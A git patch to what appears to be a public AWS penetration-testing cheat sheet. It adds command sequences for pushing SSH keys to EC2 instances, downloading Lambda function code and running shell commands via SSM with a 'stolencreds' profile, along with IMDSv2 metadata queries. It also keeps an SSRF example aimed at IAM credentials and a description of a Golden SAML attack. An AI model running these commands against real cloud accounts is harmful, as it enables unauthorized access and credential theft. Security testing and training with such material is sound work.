From 5d87804f714f08dd1f324031925936f986ce2c99 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Fri, 6 Mar 2020 13:33:14 +0100
Subject: [PATCH] AWS EC2 Instance Connect + Lambda + SSM

---
 .../Cloud - AWS Pentest.md | 45 ++++++++++++++++++-
 1 file changed, 43 insertions(+), 2 deletions(-)

diff --git a/Methodology and Resources/Cloud - AWS Pentest.md b/Methodology and Resources/Cloud - AWS Pentest.md
index 621f19f..84f624d 100644
--- a/Methodology and Resources/Cloud - AWS Pentest.md
+++ b/Methodology and Resources/Cloud - AWS Pentest.md
@@ -14,6 +14,9 @@
 * [Admin equivalent permission](#admin-equivalent-permission)
 * [AWS - Mount EBS volume to EC2 Linux](#aws---mount-ebs-volume-to-ec2-linux)
 * [AWS - Copy EC2 using AMI Image](#aws---copy-ec2-using-ami-image)
+* [AWS - Instance Connect - Push an SSH key to EC2 instance](#aws---instance-connect---push-an-ssh-key-to-ec2-instance)
+* [AWS - Lambda - Extract function's code](#aws---lambda---extract-functions-code)
+* [AWS - SSM - Command execution](#aws---ssm---command-execution)
 * [AWS - Golden SAML Attack](#aws---golden-saml-attack)
 * [Cover tracks by obfuscating Cloudtrail logs and Guard Duty](#cover-tracks-by-obfuscating-cloudtrail-logs-and-guard-duty)
 * [PenTest:IAMUser/KaliLinux](#)
@@ -162,6 +165,18 @@ ## AWS - Metadata SSRF +> AWS released an additional security defences against the attack. + +:warning: Only working with IMDSv1. +Enabling IMDSv2 : `aws ec2 modify-instance-metadata-options --instance-id --profile --http-endpoint enabled --http-token required`. + +In order to usr IMDSv2 you must provide a token. + +```powershell +export TOKEN=`curl -X PUT -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" "http://169.254.169.254/latest/api/token"` +curl -H "X-aws-ec2-metadata-token:$TOKEN" -v "http://169.254.169.254/latest/meta-data" +``` + ### Method for Elastic Cloud Compute (EC2) Example : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/iam/security-credentials/Awesome-WAF-Role/ 
@@ -360,13 +375,37 @@ aws ec2 stop-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1 aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1 ``` +## AWS - Instance Connect - Push an SSH key to EC2 instance + +```powershell +# https://aws.amazon.com/fr/blogs/compute/new-using-amazon-ec2-instance-connect-for-ssh-access-to-your-ec2-instances/ +$ aws ec2 describe-instances --profile uploadcreds --region eu-west-1 | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}" +$ aws ec2-instance-connect send-ssh-public-key --region us-east-1 --instance-id INSTANCE --availability-zone us-east-1d --instance-os-user ubuntu --ssh-public-key file://shortkey.pub --profile uploadcreds +``` + +## AWS - Lambda - Extract function's code + +```powershell +# https://blog.appsecco.com/getting-shell-and-data-access-in-aws-by-chaining-vulnerabilities-7630fa57c7ed +$ aws lambda list-functions --profile uploadcreds +$ aws lambda get-function --function-name "LAMBDA-NAME-HERE-FROM-PREVIOUS-QUERY" --query 'Code.Location' --profile uploadcreds +$ wget -O lambda-function.zip url-from-previous-query --profile uploadcreds +``` + +## AWS - SSM - Command execution + +```powershell +$ aws ssm describe-instance-information --profile stolencreds --region eu-west-1 +$ aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile stolencreds +$ aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile stolencreds +``` ## AWS - Golden SAML Attack https://www.youtube.com/watch?v=5dj4vOqqGZw https://www.cyberark.com/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-cloud-apps/ -> Using the extracted information, the tool will generate a forged SAML token as an arbitrary user that can then be 
used to authenticate to Office 365 without knowledge of that user’s password. This attack also bypasses any MFA requirements. +> Using the extracted information, the tool will generate a forged SAML token as an arbitrary user that can then be used to authenticate to Office 365 without knowledge of that user's password. This attack also bypasses any MFA requirements. Requirement: * Token-signing private key (export from personnal store using Mimikatz) @@ -492,4 +531,6 @@ https://github.com/DenizParlak/Zeus * [AWS - Cheatsheet - @Magnussen](https://www.magnussen.funcmylife.fr/article_35) * [amazon-guardduty-user-guide PenTest Finding Types - @awsdocs](https://github.com/awsdocs/amazon-guardduty-user-guide/blob/master/doc_source/guardduty_pentest.md) * [HOW I HACKED A WHOLE EC2 NETWORK DURING A PENETRATION TEST - by Federico Fernandez](https://www.secsignal.org/en/news/how-i-hacked-a-whole-ec2-network-during-a-penetration-test/) -* [How to Attach and Mount an EBS volume to EC2 Linux Instance - AUGUST 17, 2016](https://devopscube.com/mount-ebs-volume-ec2-instance/) \ No newline at end of file +* [How to Attach and Mount an EBS volume to EC2 Linux Instance - AUGUST 17, 2016](https://devopscube.com/mount-ebs-volume-ec2-instance/) +* [Getting shell and data access in AWS by chaining vulnerabilities - Riyaz Walikar - Aug 29, 2019 ](https://blog.appsecco.com/getting-shell-and-data-access-in-aws-by-chaining-vulnerabilities-7630fa57c7ed) +* [Getting started with Version 2 of AWS EC2 Instance Metadata service (IMDSv2) - Sunesh Govindaraj - Nov 25, 2019](https://blog.appsecco.com/getting-started-with-version-2-of-aws-ec2-instance-metadata-service-imdsv2-2ad03a1f3650) \ No newline at end of file